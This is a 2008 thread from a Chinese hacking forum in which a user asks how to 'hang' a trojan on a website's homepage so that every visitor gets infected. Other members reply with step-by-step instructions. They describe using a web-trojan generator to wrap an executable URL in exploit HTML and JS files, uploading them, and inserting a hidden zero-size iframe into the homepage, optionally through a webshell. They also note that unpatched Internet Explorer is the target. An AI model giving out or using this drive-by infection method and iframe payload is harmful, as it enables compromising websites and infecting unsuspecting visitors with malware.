【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: 到底要怎样才能是网马呢? [打印本页]

作者: BKK 时间: 2008-12-16 01:17 标题: 到底要怎样才能是网马呢?

直接上传exe上去,比如我上传到百度的根目录,就是 www.baidu.com/gezimuma.exe 人家进去这个地址肯定不成..我也试了下暗黑网马生成器,还是搞不明白,我..

那我要怎样才可以把我的木马挂在网站首页,让人一进这个页面就中我的马呢??请详细点~

[ 本帖最后由 wmmy 于 2008-12-16 22:04 编辑 ]

作者: 柔肠寸断 时间: 2008-12-16 12:04

网马是根据系统的漏洞来下载相关程序并运行的

如果这个漏洞都修补了

就无法成功了，上传了exe文件之后，再在网马生成器的路径处添加该文件的位置

生成了很多html文件，这些文件上传到网站上，有了一个地址

比如http://www.FFFFF.com/123.html

那么下次挂马框架的src内容就写这个

作者: wmmy 时间: 2008-12-16 22:03

把 www.baidu.com/gezimuma.exe 这个地址添加到网马生成器中生成HTM文件（有的生成器回生成好几个文件，但是以HTM这个为主要）比如说是1.htm
把这个文件上传到空间得到 www.baidu.com/1.HTM 这个地址
把<iframe src=网马地址 width=0 height=0></iframe> 这段代码插在网站页面里面里
一般多是首页这样别人一打开那个站就中了

作者: 1335csy 时间: 2008-12-17 08:46

建议你去看下挂马的教程非常简单网马生成器会生成一个HTML文件和一个JS文件都传到空间去

然后用WEBSHELL的功能去挂马吧

小柔上面也说了如果别人的IE打了的补丁的话你的马是中不进别人的电脑的

作者: BKK 时间: 2008-12-17 18:45

哈哈,这好办啊....IE补丁,谁会打啊我呸....那破IE...

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)